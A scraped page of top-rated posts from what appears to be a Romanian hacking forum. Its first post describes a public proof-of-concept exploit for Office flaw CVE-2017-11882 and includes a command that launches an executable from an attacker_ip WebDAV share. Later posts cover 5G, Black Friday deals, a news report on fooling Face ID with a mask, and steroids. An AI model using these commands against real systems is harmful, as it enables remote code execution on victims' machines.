    Microsoft Office - OLE Remote Code Execution Exploit CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html DEMO PoC exploitation: webdav_exec CVE-2017-11882 A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution. The first command which triggers WebClient service start may look like this: cmd.exe /c start \\attacker_ip\ff Attacker controlled binary path should be a UNC network path: \\attacker_ip\ff\1.exe Usage webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name Sample exploit for CVE-2017-11882 (starting calc.exe as payload) example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system. Download: CVE-2017-11882-master.zip or git clone https://github.com/embedi/CVE-2017-11882.git Mirror: webdav_exec_CVE-2017-11882.py Source
  44. 3 points
    Ai un medicament "anti-cancer" si ai nevoie de promovare? Daca era bun nu se promova singur? Pleaca de-aici daca incerci sa te imbogatesti de pe urma celor care sufera de asa ceva vanzandu-le gogosi.
  45. 3 points
    Daca te referi la treaba dintre Erdeesh si Ericcson e doar pregatire (care dureaza cativa ani) pentru a suporta 5G-ul, nu implementarea in sine. Chiar daca e promitator, momentan 5G-ul e inca in stadiul de research. De acolo si pana la stadiul de business si consumer roll-out e alta mancare de peste. Discutam recent cu un academic care lucreaza in domeniu si echipele lor au primit finantari de la Gov UK si firme gigant (printre care si Ericcson) de multe milioane de ££ pentru research si zicea ca se pune foarte mult accent pe securitate. O firma de consultanta si security cu cativa baieti (si fete ) destepti who know their stuff ar putea mulge ceva milioane in viitorul apropiat.
  46. 3 points
    Păi stai. Dacă la un mil de like-uri ai un impact de aproximativ 300-1000 de like-uri la o postare din ce am văzut, e foarte puțin. Adică zic că dacă ai un cont de pizdă cu 2000 de fani și postezi o țâță, ai sigur 1500 de like-uri, față de a ta cu 900 și peste un milion de like-uri. Zic și eu. Cum ziceau și băieții poate vinzi numărul în sine de like-uri al paginii, că altfel nu face nici pe departe atât cu reach-ul ăla al postărilor. Gândește-te că dacă cineva are un produs, de 150 de sute de coco face mult mai multe conversii decât dacă ți-ar cumpăra ție pagina, chiar pe termen lung vorbind. Spor la vânzare!
  47. 3 points
    Poate iti iese si tie de un pateu. Telefon mobil Samsung Galaxy S7, 32GB, 4G, Black, 1.000 de bucăți la 1.499,99 de lei https://www.emag.ro/...m/pd/DJXR03BBM/ Combina frigorifica Arctic AK54270+, 262 l, H 170.5 cm, Clasa A+, 500 de bucăți la 599,99 de lei https://www.emag.ro/...0/pd/DQFG82BBM/ Detergent capsule Ariel Pods 3 in 1, 3 X 39 spălări, 4.000 de bucăți la 89,99 de lei https://www.emag.ro/...3/pd/DVBYB0BBM/ Consola Microsoft Xbox One Slim 500 GB, 500 de bucăți la 599,99 de lei https://www.emag.ro/...0/pd/D01LQ7BBM/ Acumulator extern A+, 10.000 mAh, 5.000 de bucăți, la 39,99 de lei https://www.emag.ro/...w/pd/DF3W42BBM/ Televizor LED Nei, 81 cm, HD, 1.000 de bucăți la 399,99 de lei https://www.emag.ro/...0/pd/DTFY6NBBM/ Tigaie wok Tefal Only Cook, 28 cm, thermo-spot, 3.000 de bucăți la 49,99 de lei https://www.emag.ro/...5/pd/DVWK9NBBM/ Laptop Lenovo IdeaPad, procesor Intel Celeron N3060 frecventa 2.48 GHz, ecran 15.6", memorie 2GB, hard disk 500 GB, Intel HD Graphics 400, Black, 500 de bucăți la 499,99 de lei https://www.emag.ro/...i/pd/DC6DSNBBM/ Aparat de gătit cu aburi și blender Philips-AVENT SCF870/22, 1.200 de bucăți la 349,99 de lei https://www.emag.ro/...2/pd/E1TNKBBBM/ Anvelopa iarna Orium 601 185/65 R15 88T, 1.000 de bucăți la 99,99 de lei https://www.emag.ro/...1/pd/D9TB92BBM/ Selgros http://www.selgros.ro/catalog/black-friday-nr-46?id=115#book/page/1 Flanco https://drive.google.com/open?id=154xgZNJEXFoWh2HMdVm7mVRf-3oSxHxM >adunate de pe net. >getagolf.com >donatii >bf >muie profitshare.
  48. 3 points
    Esti sigur ca ai pus preturile corect si nu ai o problema la tastatura? Se tot apasa "k" dupa fiecare cifra....
  49. 3 points
    l'd like to take his... his Face ID... off Video Apple's facial-recognition login system in its rather expensive iPhone X can be, it is claimed, fooled by a 3D printed mask, a couple of photos, and a blob of silicone. Bkav Corporation, an tech security biz with offices in the US and Singapore, specializes in bypassing facial-recognition systems, and set out to do the same with Face ID when it got hold of a $999 iPhone X earlier this month. The team took less than a week to apparently crack Cupertino's vaunted new security mechanism, demonstrating that miscreants can potentially unlock a phone with a mask of the owner's face. "Everything went much more easily than you expect. You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face," the biz said in an advisory last updated on Saturday. "It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought." After registering a person's face on the phone – and the handset should only unlock when it sees this face – the team built a 3D printed mask of the test subject using an off-the-shelf 3D printer. They then put 2D printouts of the user's eyes, upper cheekbones and lips over the mask and added a silicone nose for realism. The creation wasn't able to defeat Face ID at first, as other folks with the same idea have found. But by sculpting and shading the false nose on one side to imitate shadow – plus a few other tweaks – the team managed to use the mask to fool the iPhone X into unlocking, it is claimed. The hack was cheap – Bkav estimates the total cost in materials for a face to hoodwink Face ID was around $150. It acknowledged that the hack isn’t for everyone to try out. It requires an in-depth knowledge of how Apple's face-scanning software works and what the weak points in the system are. "With Face ID's being beaten by our mask, FBI, CIA, country leaders, leaders of major corporations, etc are the ones that need to know about the issue, because their devices are worth illegal unlock attempts," it said. "Exploitation is difficult for normal users, but simple for professional ones." The team is still researching how to crack the system more easily and refining their methods. In the meantime the biz advises sticking to fingerprints for biometric security. ® Via theregister.co.uk
  50. 3 points
    Evenimente petrecute pana acuma: When adult males take Dianabol, just as with every other anabolic steroid, the body’s natural production of testosterone becomes suppressed. When this happens and testosterone levels stay suppressed for an extended length of time, there are several consequences.There is an additional side effect when the natural production of testosterone is suppressed and that is since it’s made in the testicles, when production is severely slowed down, the testicles will naturally atrophy due to lack of activity. Iti recomand sa iti faci o analiza de testosteron, doar 41 de lei la synevo. Nu uita sa pui rezultatul si pe forum, mor de curiozitate.
×